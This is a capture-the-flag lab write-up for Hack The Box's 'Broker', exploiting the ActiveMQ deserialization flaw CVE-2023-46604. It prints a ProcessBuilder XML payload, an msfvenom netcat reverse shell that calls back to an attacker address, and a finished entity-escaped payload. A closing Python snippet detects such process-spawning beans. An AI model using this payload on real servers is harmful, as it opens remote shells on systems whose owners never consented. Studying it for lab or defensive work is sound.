XML
The [[Broker_CVE-2023-46604#[Exploit](https://github.com/X1r0z/ActiveMQ-RCE)|exploit package]] comes with a PoC payload, poc.xml:
```console
┌──(kali㉿kali)-[~/…/htb/labs/broker/ActiveMQ-RCE]
└─$ cat poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>open</value>
                <value>-a</value>
                <value>calculator</value>
                <!-- <value>bash</value>
                <value>-c</value>
                <value>touch /tmp/success</value> -->
            </list>
        </constructor-arg>
    </bean>
</beans>
```
The payload is an XML document that references the Java class java.lang.ProcessBuilder and invokes its start method, which creates an operating system process. In particular, it launches the Calculator application.
The commented-out section hints at Unix command execution instead, as shown by bash -c touch /tmp/success.
Change
Since I don't just intend to create a file at /tmp/success, I will need to alter the payload to gain a foothold.
msfvenom
```console
┌──(kali㉿kali)-[~/…/htb/labs/broker/ActiveMQ-RCE]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.8 LPORT=9999
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 88 bytes
mkfifo /tmp/osaj; nc 10.10.16.8 9999 0</tmp/osaj | /bin/sh >/tmp/osaj 2>&1; rm /tmp/osaj
```
msfvenom generates a reverse shell payload.
Complete
Since the XML payload will be interpreted by the backend Java application in the target system, I will need to change the generated reverse shell payload.
XML has strict rules about which characters can appear directly in the content of a document. Certain characters, like `<`, `>`, and `&`, are reserved for markup and cannot be used directly in text content. If these characters are to be included as data, XML entities must be used instead. Here are the common XML entities:
- `&lt;` for `<`
- `&gt;` for `>`
- `&amp;` for `&`
- `&quot;` for `"`
- `&apos;` for `'`
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <!-- reserved characters of the shell command are entity-escaped so the XML stays well-formed -->
                <value>mkfifo /tmp/osaj; nc 10.10.16.8 9999 0&lt;/tmp/osaj | /bin/sh &gt;/tmp/osaj 2&gt;&amp;1; rm /tmp/osaj</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
```
Ready for deployment
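An added example (not part of the original writeup or the exploit package) that shows both sides of the escaping step from a defender's seat: it encodes the reserved characters with the entities listed above, and it parses a Spring beans document like the one above to flag any bean that would spawn a process and recover the exact argv the broker would execute, which is what you would do when triaging an XML file fetched by a compromised ActiveMQ instance. The sample document is constructed from the payload above; the function and constant names are mine.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Bean classes that have no business in a broker configuration; a bean of this
# class with init-method="start" is exactly the pattern of the PoC above.
SUSPICIOUS_CLASSES = {"java.lang.ProcessBuilder"}

# Constructed sample: the payload above in its entity-escaped form.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value>mkfifo /tmp/osaj; nc 10.10.16.8 9999 0&lt;/tmp/osaj | /bin/sh &gt;/tmp/osaj 2&gt;&amp;1; rm /tmp/osaj</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
"""

def to_xml_text(s: str) -> str:
    """Replace the five reserved characters with the entities listed above."""
    return escape(s, {'"': "&quot;", "'": "&apos;"})

def is_well_formed(xml_text: str) -> bool:
    """False when the document does not parse, e.g. a raw < or & left in text."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

def _local(tag: str) -> str:
    # Drop the {namespace} prefix so the check works with or without xmlns.
    return tag.rsplit("}", 1)[-1]

def find_process_beans(xml_text: str) -> list:
    """Return each process-spawning bean with the decoded argv it would run."""
    hits = []
    for bean in ET.fromstring(xml_text).iter():
        if _local(bean.tag) != "bean" or bean.get("class") not in SUSPICIOUS_CLASSES:
            continue
        # The parser decodes the entities, so argv is what ProcessBuilder receives.
        argv = [v.text or "" for v in bean.iter() if _local(v.tag) == "value"]
        hits.append({"id": bean.get("id"), "class": bean.get("class"),
                     "init_method": bean.get("init-method"), "argv": argv})
    return hits
```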